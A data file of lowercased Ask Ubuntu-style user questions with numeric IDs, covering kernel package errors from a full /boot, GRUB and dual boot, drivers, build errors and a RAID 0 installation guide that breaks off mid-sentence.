/etc/kernel/postinst.d/apt-auto-removal 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic update-initramfs : generating /boot/initrd.img-3.8.0-27-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-27-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-27-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-27-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-27-generic : linux-image-extra-3.8.0-27-generic depends on linux-image-3.8.0-27-generic ; however : package linux-image-3.8.0-27-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-27-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-27-generic ; however : package linux-image-3.8.0-27-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.8.0-27-generic ; however : package linux-image-extra-3.8.0-27-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-geno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already neric : linux-generic depends on linux-image-generic ( = 3.8.0.27.45 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-generic ( = 3.8.0.27.45 ) ; however : package linux-generic is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-25-generic : linux-image-extra-3.8.0-25-generic depends on linux-image-3.8.0-25-generic ; however : package linux-image-3.8.0-25-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-25-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-26-generic : linux-image-extra-3.8.0-26-generic depends on linux-image-3.8.0-26-generic ; however : package linux-image-3.8.0-26-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-26-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.8.0-25-generic linux-image-3.8.0-26-generic linux-image-3.8.0-27-generic linux-image-extra-3.8.0-27-generic setting up linux-image-3.8.0-27-generic ( 3.8.0-27.40 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.8.0-27-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic update-initramfs : generating /boot/initrd.img-3.8.0-27-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-27-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-27-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-27-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-3.8.0-25-generic ( 3.8.0-25.37 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.8.0-27-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic update-initramfs : generating /boot/initrd.img-3.8.0-25-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-25-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-25-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-27-generic ; however : package linux-image-3.8.0-27-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-image-3.8.0-26-generic ( 3.8.0-26.38 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.8.0-25-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-26-generic /boot/vmlinuz-3.8.0-26-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-26-generic /boot/vmlinuz-3.8.0-26-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-26-generic /boot/vmlinuz-3.8.0-26-generic update-initramfs : generating /boot/initrd.img-3.8.0-26-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-26-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-26-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-26-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-27-generic : linux-image-extra-3.8.0-27-generic depends on linux-image-3.8.0-27-generic ; however : package linux-image-3.8.0-27-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-27-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-26-generic : linux-image-extra-3.8.0-26-generic depends on linux-image-3.8.0-26-generic ; however : package linux-image-3.8.0-26-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-26-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-25-generic : linux-image-extra-3.8.0-25-generic depends on linux-image-3.8.0-25-generic ; however : package linux-image-3.8.0-25-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-25-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.27.45 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-generic ( = 3.8.0.27.45 ) ; however : package linux-generic is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured
333862	repetitive tasks with bash scripting	i have a php console app and ubuntu server . i 'm executing it with this basic command php app.php i want to execute it repetitively , but cronjobs not suitable for me . i want to execute again and again when app.php finish working . it wo n't be executed every x minutes , it will be executed again immediately when it 's finish work ( like infinity loop ) . so i will use bash scripting . while true ; do php app.php done this will solve my problem . but usage of while true seems evil . is it possible to stop this bash script , if i need ? or can you tell me best way to do this ? ( app.php file , fetching a long list of website urls and fetching their content . it 's like a web spider . i will connect to server via ssh , execute bash script with nohup , and then close terminal. )
333865	problem with cmake variables on compilation	i 'm trying to compile kbibtex using cmake ../ -dcmake_install_prefix=/usr -dcmake_build_type=release & & make but i get the following error cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : libxslt_include_dir ( advanced ) used as include directory in directory /home/user/downloads/kbibtex-0.4.1/src/libkbibtexio used as include directory in directory /home/user/downloads/kbibtex-0.4.1/src/libkbibtexio libxslt_libraries ( advanced ) linked by target `` kbibtexio '' in directory /home/user/downloads/kbibtex-0.4.1/src/libkbibtexio poppler_qt4_include_dir ( advanced ) used as include directory in directory /home/user/downloads/kbibtex-0.4.1/src/libkbibtexio used as include directory in directory /home/user/downloads/kbibtex-0.4.1/src/libkbibtexio poppler_qt4_library linked by target `` kbibtexio '' in directory /home/user/downloads/kbibtex-0.4.1/src/libkbibtexio -- configuring incomplete , errors occurred !
333868	the device bluetooth ralink rt3290 is not recognized on my laptop hp pavilion g4-2240br	os : ubuntu 13.04 . laptop : hp pavilion g4-2240br . device bluetooth : ralink rt3290 . the device bluetooth ralink rt3290 is not recognized on my laptop hp pavilion g4-2240br , the wireless device works perfectly but no bluetooth device . i 've ran the command lsusb and rfkill list all and saw that theoretically the drivers are installed correctly but the bluetooth device does not work : hp-pavilion-g4-notebook-pc : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp.. integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp.. integrated rate matching hub bus 001 device 001 : id 1d6b : 0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b : 0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b : 0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b : 0003 linux foundation 3.0 root hub bus 002 device 003 : id 05c8 : 0348 cheng uei precision industry co. , ltd ( foxlink ) hp-pavilion-g4-notebook-pc : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no
333869	programming linux	i want to make an application in c # , or in c++ or in what ever programming language even in script language as bash . the application will ask for an answer , e.g . 1+1 ? and the password will be 2 if it is right then will log you in . i dont want to answer how i will write the application , just how to implement that action in linux . how can i accomplish that in ubuntu . ( 10.04 or 12.04 ) thank you in advance , best regards thio
333872	grub problem with list	i have problem with my grub after upgrading ubuntu . i have backtrack , ubuntu , windows my problem is that it does show : ubuntu 3.4 kernel and supposedly should be ubuntu 12.04 but it is is loading the backtrack . i guess grub is messed up . how i can access the list that is generated by grub ?
333875	creating filesystem from nothing	i need to create filesystem with just one partition from nothing ( /dev/zero ) . i tried this sequence of commands : dd if=/dev/zero of=mountedimage.img bs=512 count=131072 fdisk mountedimage.img n p 2048 131072 basically , i need to create 64mb image file filled with zeroes . then i use fdisk to create new partition for new filesystem , starting at sector 2048 and using all remaining sectors . but now i 'm hitting problems . if i set up a loop device and format it using mkfs -t vfat , partition table is overwritten and filesystem is placed to disk . i do n't need whole disk formatted with fat32 , i just need my primary partition to be so . does anybody know how can i format only one partition of raw disk image , not whole image ? please help .
333877	which version of ubuntu is the most stable in a dual boot with windows 8 ?	i am running a laptop with windows 8 and ubuntu . i had been running with the dual boot with ubuntu 12.04 , but had a disc failure ( unreleated to linux ) and have had to start over . i had some problems with a shared ntfs data drive , wherein files i wrote to the drive in ubuntu would not appear in windows 8 . i was wondering what is currently viewed as the best version of ubuntu to run alongside windows 8 . thanks .
333880	is there a benefit to using grub or windows 8 boot manager over the other ?	i 'm preparing to run a windows 8 / ubuntu dual boot system . i 've seen several posts which discuss using the windows 8 boot manager instead of grub ( as i have used in the past ) . is there a technical or other benefit to using one instead of the other , or is it simply a matter of preference ? thanks .
333888	why is my nginx package not upgraded ?	i 'm trying to upgrade my nginx install to 1.3+ . i already added the ppa for nginx/development and updated with apt-get update . i ran this command to install nginx : me @ server : ~ $ sudo apt-get install nginx ... snip ... unpacking nginx ( from ... /nginx_1.5.0-1~ppa1~raring_all.deb ) ... setting up nginx ( 1.5.0-1~ppa1~raring ) ... however : me @ server : ~ $ nginx -v nginx version : nginx/1.2.6 ( ubuntu ) it looks like it installed nginx 1.5 , but installed it someplace wacky . i have no idea how to find it if it did . what am i doing wrong ?
333892	unable to install cblas on ubuntu ( x-post from stackoverflow )	i am trying to install cblas on ubuntu , and am , as far as i can see , following the instructions in the readme file that came in the folder . when i do a 'make all ' , i get the following errors that i just do not understand : make [ 1 ] : entering directory `/home/ubuntu/ernieproject_c/pascalinpaintcodes/cblas/t esting' gfortran -o xscblat1 c_sblat1.o c_sblas1.o ../lib/cblas_linux.a ../lib/cblas_linux .a ../lib/cblas_linux.a ( cblas_srotg.o ) : in function `cblas_srotg ' : cblas_srotg.c ( .text+0x1 ) : undefined reference to `srotg_' ../lib/cblas_linux.a ( cblas_srot.o ) : in function `cblas_srot ' : cblas_srot.c : ( .text+0x3b ) : undefined reference to `srot_' ../lib/cblas_linux.a ( cblas_sswap.o ) : in function `cblas_sswap ' : cblas_sswap.c : ( .text+0x21 ) : undefined reference to `sswap_' ../lib/cblas_linux.a ( cblas_sscal.o ) : in function `cblas_sscal ' : cblas_sscal.c : ( .text+0x25 ) : undefined reference to `sscal_' ../lib/cblas_linux.a ( cblas_scopy.o ) : in function `cblas_scopy ' : cblas_scopy.c : ( .text+0x21 ) : undefined reference to `scopy_' ../lib/cblas_linux.a ( cblas_saxpy.o ) : in function `cblas_saxpy ' : cblas_saxpy.c : ( .text+0x2f ) : undefined reference to `saxpy_' ../lib/cblas_linux.a ( sdotsub.o ) : in function `sdotsub_ ' : sdotsub.f : ( .text+0x7 ) : undefined reference to `sdot_' ../lib/cblas_linux.a ( snrm2sub.o ) : in function `snrm2sub_ ' : snrm2sub.f : ( .text+0x7 ) : undefined reference to `snrm2_' ../lib/cblas_linux.a ( sasumsub.o ) : in function `sasumsub_ ' : sasumsub.f : ( .text+0x7 ) : undefined reference to `sasum_' ../lib/cblas_linux.a ( isamaxsub.o ) : in function `isamaxsub_ ' : isamaxsub.f : ( .text+0x7 ) : undefined reference to `isamax_' ../lib/cblas_linux.a ( scasumsub.o ) : in function `scasumsub_ ' : scasumsub.f : ( .text+0x7 ) : undefined reference to `scasum_' ../lib/cblas_linux.a ( scnrm2sub.o ) : in function `scnrm2sub_ ' : scnrm2sub.f : ( .text+0x7 ) : undefined reference to `scnrm2_' collect2 : ld returned 1 exit status make [ 1 ] : *** [ xscblat1 ] error 1 make [ 1 ] : leaving directory `/home/ubuntu/ernieproject_c/pascalinpaintcodes/cblas/te sting' make : *** [ alltst ] error 2 here is the makefile.in . i modified it a teeny bit , as per instructions . here it is : # # makefile.linux # # # if you compile , change the name to makefile.in . # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # shell # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - shell = /bin/sh # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # platform # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - plat = linux # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # libraries and includes # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - bllib = ../lib/cblas_linux.a cblib = ../lib/cblas_ $ ( plat ) .a # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # compilers # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cc = gcc fc = gfortran loader = $ ( fc ) # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # flags for compilers # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cflags = -o3 -dadd_ fflags = -o3 # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # archive programs and flags # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - arch = ar archflags = cr ranlib = ranlib the line i modified here was bllib = ../lib/cblas_linux.a i just changed the path . and now there is a cblas_linux.a in ../lib , so that is , i think , correct . please , any pointers to why i am getting these errors would be really helpful . is n't cblas supposed to be self-contained ? why does it even show such undefined references ? thank you for reading and for any suggestions !
333897	how to apply xmodmap permanently	i had to make some changes to the xmodmap in my home directory . when i execute xmodmap ./.xmodmap everthing works as expected . but i ca n't figure out how to apply this permanently . i tried to add it to a file called .xinitrc liek suggested in other questions here but it 's just not working . my system is freshly installed 13.04 64bit .
333899	installation stuck now ca n't even enter bios	i was installing ubuntu from dvd on windows8 machine and gace the option to delete windows . it stuck at the stage , where you enter your name etc . and i could n't press next , so i had to switch off computer . now when i switch the computer it shows black scrren , ca n't even enter bios . can you recommend anything ?
333900	check if my 12.04 has graphics card drivers and find the right ones	how can i check whether my system has a driver for the graphics card installed ? and if it has n't , how can i find which one to install , through the repositories or through other sources ? i got ubuntu 12.04 . i have tried what this post suggests - i also have ati radeon 4500 hd card , or something like that - and i ended up still having nothing showing i do have a driver , plus my unity 3d became unity 2d , so i purged fglxr right away . any other suggestions ?
333901	screen - do command on start	i can not find this anywhere on google/se , excuse me if it was just my wording . i want to make screen do a command upon start . with pseudo code , doing screen -s somescreen -c somescript.sh would make it execute somescript.sh automatically , without going into screen and typing this . thanks ! ( there is no tag for the screen command )
333906	can you still use windows 8 and have ubuntu as the desktop ?	i have watched tons of videos on this topic and i have looked it up all over the internet and it does seem to help . i want to know that i can still use windows 8 programs and features while having 12.10 as my desktop .
333908	how to do a 50 $ donation	i have been using ubuntu for many years and would like to give 50 cdn dollars , using my visa card not paypal . how do i proceed thanks
333918	is it possible to restore a full system back in time backup from a bios system to another uefi system ?	i have backup my whole ubuntu system ( / ) using back in time and i need to restore it to different pc , is it possible ? i have used bios on my old pc , is itpossible to restore it to my new pc but with the differce my new pc starting with uefi ?
333919	no permissions for software center	i jsut installed ubuntu 13.04 ( coming from 11.04 ) today . and i ca n't use the software center from the dash . when i start it from the dash , it always says that i do n't have enough permissions to install software . but my user is in the sudo adm and lpadmin group as it should be . the only way i can use it is sudo software-center in the console . why does n't it just ask for my password like it always did ? whats the problem here ?
333921	list all internet connections	i 'd like to know all the connections by system is making to the internet . i did netstat but it shows a lot of connections - all of which are n't applicable i think . can it be displayed like top does for processes ? i 'm a little security conscious and would like to know all the incoming and outgoing connections happening on my system .
333925	hbo go does n't work	does anybody know how to get hbo go to work on ubuntu ? i have installed hal . tried it with and without pepperflash . deleted the flash player folder . none of that works .
333928	dvds have only roughly 2 kb of space	i have several dvd-r 4.7 gb disks and when i enter them into my computers disk tray , ubuntu only reads 2.0 kb . it is different for each disk , but it is always roughly around 2.0 kb and all 50 or so disks that are in this pack seem to be affected . i do not have any other disks to try and check if i somehow managed to get a bad pack , but in the past , in different installations of ubuntu , these disks have worked just fine . i used to use them to burn play station 2 games . i have yet to try these disks in another computer , but i have no access to another computer .
333930	mouse pointer in tty terminal	good evening , just experienced a funny bug ( ? ) : when i switch to tty terminal , my mouse pointer still appears , but is in the center of the screen . when i switch back into graphical mode , the pointer is on the same position as when i switched to terminal mode . course , this is not sore , but it 's strange ! did someone experienced it before ? i do just after the latest updatesâś does anyone know against which package to file a bug in launchpad ? thanks ; ) system spec : kernel linux 3.8.0-27-generic x86_64 graphic card : vga compatible controller : advanced micro devices [ amd ] nee ati rs780m [ mobility radeon hd 3200 ] ( prog-if 00 [ vga controller ] ) driver ( output of lspci -nnk | grep -a3 amd ) : 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rs780m [ mobility radeon hd 3200 ] [ 1002:9612 ] subsystem : toshiba america info systems device [ 1179 : ffb0 ] kernel driver in use : radeon
333931	ubuntu for phones or new android os	so i got a barely used phone from my buddy . he had thought it was stolen just after buying it , but has recently found it and given it to me because it has a little port for a sim card . since i have t-mobile i thought that i would simply have to root and unlock the phone via some online tutorial and pop the sim in , but to no avail . i ca n't find much info on the phone and it seems to only run cdma . nothing happens when i insert my sim card . it is the zte engage v8000 . it is a muve music phone from cricket . i was wondering if i could just put ubuntu for phones on it and it would detect my sim . would that work ? i feel like ubuntu for phones might be thrown out there enough for it to work . if not , how can i get my sim card to work on the android os ? do i need to install a whole new operating system ? is there any way that i can use this phone ? my current phone does n't seem to have a strong enough antenna for my area . it 's a cheapy knock-off from hong kong so anything else would work . any help is much appreciated
333935	remove desktop from home folder	i 'm using gnome shell and have the desktop turned off . so there are no icons and it 's not clickable except for the right click which offers to change my wallpaper . there 's still a folder for the desktop in my home folder which is now serving no purpose . how can i get rid of it ? i tried changing ~/config/user-dirs.dir and /etc/xdg/user-dirs.defaults to not include the desktop but the folder remains there after a reboot .
333937	hdmi does n't work on ubuntu	i have two computers . the first computer has windows 7 and the other computer has ubuntu 12 . when connected to windows 7 everything works properly , but when connected to the other computer it is not showing anything . i tried to look for the device driver , but i can not find how . i have a gigabyte ga-h61m-usb3h motherboard which includes hdmi with sound . does anyone have any ideas ?
333938	how do i get a qualcomm atheros killer e2200 gigabit ethernet card working ?	i bought a new computer , hoping to dual boot win 8 and ubuntu 13.04 . i have successfully installed both os , but in ubuntu i have no connection to the internet , even though the ethernet cable is plugged in and internet works perfectly in win 8 . already in the ubuntu installer , it says that i have no internet connection . things that might be of interest : i have this motherboard : msi z87-g45 gaming ( http : //www.msi.com/product/mb/z87-g45-gaming.html # specification ) internet did not work in win 8 until i installed the networking drivers that came with the motherboard ( killer ethernet something ) i have tried different installation configurations , tried v. 13.04 , 12.04 and 12.10 , and tried installing on a separate hard drive . ( the fact that the installer says `` no internet connection '' seems to indicate that the problem has nothing to do with the installation though . ) i ca n't even reach my router at 192.168.0.1 . the motherboard has no wireless capabilities . if i run the terminal command lspci i get the following output ( among other things ) : 03:00.0 ethernet controller : qualcomm atheros killer e2200 gigabit ethernet controller ( rev 13 ) i have spent hours and hours googling , trying many different suggested methods and not quite finding someone who seems to be having the same problem .
333952	ioerror ( 13 , 'permission denied ' )	i 'm running a python program and i cant save any changes and i get this error message ... < function savefile at 0x31dfb90 > : ioerror ( 13 , 'permission denied ' ) if you need to know any other info please ask , i need help ! can anyone tell me how to give the program permission ? or fix the probleme in any other way ? thanks !
333954	how to shorten a file in the terminal	i saved a python file in my desktop and want to run it in the terminal , but everytime i run it i have to type ' python /home/m3gn/desktop/ex1.py' is there anyway to shorten this so that i only have to type 'python ex.1 ' ? thank you !
333955	touch support for ubuntu	i have a hewlett-packard ( hp ) aio 23-f2300a touchsmart pc and have installed elementaryos on it , but unfortunately it does not support touch . and i 've just checked out the ubuntu website and i have to say , i 'm really looking forward to downloading ubuntu ! but i have just one question , which i ca n't seem to find an answer to . does the latest version of ubuntu have touch support ? ( this is not a laptop/netbook/notebook , etc - it 's a normal all in one desktop computer with full multi-touch support ) .
333957	how to update from a unsupported version of ubuntu to latest ?	how can i update my ubuntu version ( 11.04 ) to the latest version without any disks/usb drives ? i am currently running 11.04 ( just installed it ) and i can not download any programs which is the main thing i do with my computer , so i would like to update so i can do so . how may i be able to do this ?
333967	completely factory reset my computer help !	i am not happy with the results of an overwrite of windows 7 with linux . my laptop never came with a windows 7 installation disc , yet i 'd love to go back to windows 7 . how would i go about doing this ? if you need any computer info , tell me .
333970	how can i back up a grub theme ?	a friend set up a really good grub configuation for my brother 's laptop that has a backgound image . ( it also autoselects the last option he chose during each boot ) there should be some way that i can pull these settings and apply them to my laptop correct ? can someone tell me where this stuff is located , how to apply it to another computer ?
333972	when buying a computer for ubuntu , what should i look for ?	i am buying a computer with the main intent of running ubuntu , would i get the best compatibility and performance with a windows based computer or a mac based computer ? if it runs better on windows based machines : which manufacturer ( dell , hp , ... ) has the best compatibility with ubuntu ? does ubuntu run on the intel ix series as well as it does on the amd series ? are there any problems running ubuntu on an amd processor ? if it runs better on mac based machines : does ubuntu support thunderbolt ? will it support thunderbolt in 13.10 ? how good is the support for the hardware peripherals ? network card , graphics card , ... general questions about both : are ssd 's recommended or not recommended ? should you not use a swap partition with an ssd ? what is the maximum amount of ram ubuntu-64 bit can handle ? does ubuntu have support for quad+ core processors ? edit : i am interested in getting a desktop ( so if it were a mac it would be the imac ) . i would want to spend less than $ 1500 us .
333976	graphics card incompatibility ubuntu 13.04	i installed ubuntu 13.04 . i first tried installing via cd but the install would freeze on the second step every time . i made a usb and the install ran perfectly . i restarted the machine and everything loaded fine . i get to the login screen and login to my account . this appears to be functioning normally as well . however , as soon as i click on something , the screen goes wild with thousands of colored boxes that change and move with mouse movement and clicks . i do n't know how i can fix the glitch . is 13.04 just not compatible yet ? as this now appears to be an incompatibility with my graphics card , here is more information on that . i have a dell inspiron 530 and a look up of that gives the graphics card as being an `` nvidia geforce8300 gs '' dell product support page : http : //www.dell.com/support/troubleshooting/us/en/04/servicetag/1hqw8f1 ? s=dhs i am unable to access any sort of settings pages on the computer itself as the glitches make it entirely impossible . would it be possible to remotely log into the computer and change preferences somehow ?
333980	computer battery not charging	i recently converted my brand new acer aspire m to ubuntu 13.4 and i have the same problem ( bran new computer and was working fine with windows 8 ) . the battery icon is always in red saying i have little time left whether is plugged in or on battery . any thoughts ?
333989	how do i fix this error ? error : opening the cache	how do i fix this error ? error : opening the cache ( e : type 'http : //deb.opera.com/opera/ ' is not known in line 1 in source list /etc/apt/sources.list.d/opera.list , e : the package lists or status file could not be parsed or opened. ) ' . this usually means that your installed packages have unmet dependencies . i just want the error gone . i was trying to download opera and ca n't do it obviously ! i do n't like the firefox or chromium browser , so i wanted to try opera , which failed .
333991	why does the following radio stream url works in a browser but not in rhythmbox ?	http : //stream.rfi.fr/rfimusiquemonde/all/rfimusiquemonde-64k.mp3 i have all the plugins to play radio . other radios play well . if i paste that link as is in chromium it works . rhythmbox just says ( paused ) and nothing happens . ideas ?
333997	grub rescue error after installing windows 8	i am currently using ubuntu 13.04 , plan to installed dual boot , so i installed windows 8 , after the successful installation of windows 8 , i installed easy bcd and add a new entry for dual boot , after adding the entry i restart and the new menu appears as ubuntu , when i clicked that one , its showing like , below click the link for image ref . http : //tinyurl [ dot ] com/image4ref i clear this problem by reinstalling grub using live cd , now both the os working as dual . my question is i liked the easy bcd dual boot menu , how should i solve the easy bcd error .
334000	how to share virtualbox guest 's internet connection with host ?	i 'm using ubuntu 12.04 with windows xp sp3 installed as a virtual machine , the only way for me to access the internet is using a wimax usb modem which is not available for linux , i managed to install it on xp and get it to work but i do n't know how to share that connection with ubuntu.i googled it and found so many workarounds and do n't know which the best one that suits my need , i 'm not an expert . could someone shows me an easy way to do that ? thanks !
334007	i have the newest adobe flash player , but it still wont work !	i have the newest flash player , but i cant get it to work on the website pogo.com . it says : your adobe flash player is out of date no need to panic , you just need the latest version of adobe flash player to play this game . please visit adobe.com to update your version now . update adobe flash player still experiencing issues ? check out adobe 's flash troubleshooting guide i am very new to linux , so this is probably an easy fix , but still need help ! so please help ! : )
334012	a guide to install ubuntu 13.04 using a raid 0	getting the error : unable to install grub in /dev/sda ? because you are using a bios/fakeraid0 ? if you manage to find this thread consider yourself in luck . i spent the last 48 hours trying to figure how the easiest way to configure ubuntu 13.04 using fakeraid 0 or bios raid 0 , whatever you want to call it after reading different options from many different forums . others tell you oh software raid is better than fakeraid , and why are you using raid 0 ? if you are like me and ignoring them follow my instructions below and i promise you this will be the easiest way to install u13.04 on a fakeraid0 without jumping through hoops with a lot of terminal commands and reading a crap load of forums . disclaimer : i installed u13.04 by wiping both hdd 's . this is not a dual boot scenario . if you can create an additional raid volume in your bios utility and use this working aid , go right ahead . necessities : u13.04 live cd & 2 hdd's power on pc . configure bios to boot from live cd , by pressing whatever your bios setup button is f2 , f9 , f12 , del , esc , save your settings once you 've changed your boot order to cd/dvd-rom . insert u13.04 live cd access your raid array utility , for me it was ctrl + i delete any old raid volume 's you currently have to wipe the slate clean create a new raid 0 volume , name it whatever you like , save changes , exit . at this point your 2 disks should be united as one and your boot screen should show them members of 0 ( or whatever your volume number is ) and you should boot into the live cd . select : install ubuntu 13.04 , follow all your desired options to complete installation . when you get the error unable to install grub at the end of the installation , continue without the bootloader . restart pc . at this point the system has ubuntu on it , you just do n't have a way to get to it . so insert your ubuntu disc again , since the system probably kicked it out . boot from live cd again then select : try ubuntu connect to the internet , wifi is in top right corner . top left corner is an ubuntu icon , click it . search for 'terminal ' , hit enter . type the following : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update , hit enter . once the terminal finishes downloading the boot-repair from the repository type the following : sudo apt-get install -y boot-repair & & ( boot-repair & ) , hit enter . the boot-repair window should open . select : recommend repair do not select any other option . when you get the successful screen , record the `` http : //paste.ubuntu.com/xxxxx '' in the event the boot-repair did n't work so you could contact the guys that supplied the boot-repair option which is listed in the link below : https : //help.ubuntu.com/community/boot-repair # a2nd_option_ % 3a_install_boot-repair_in_ubuntu hope this helps . and i guess since i am suppose to prompt a question in this forum , here it is : why did n't 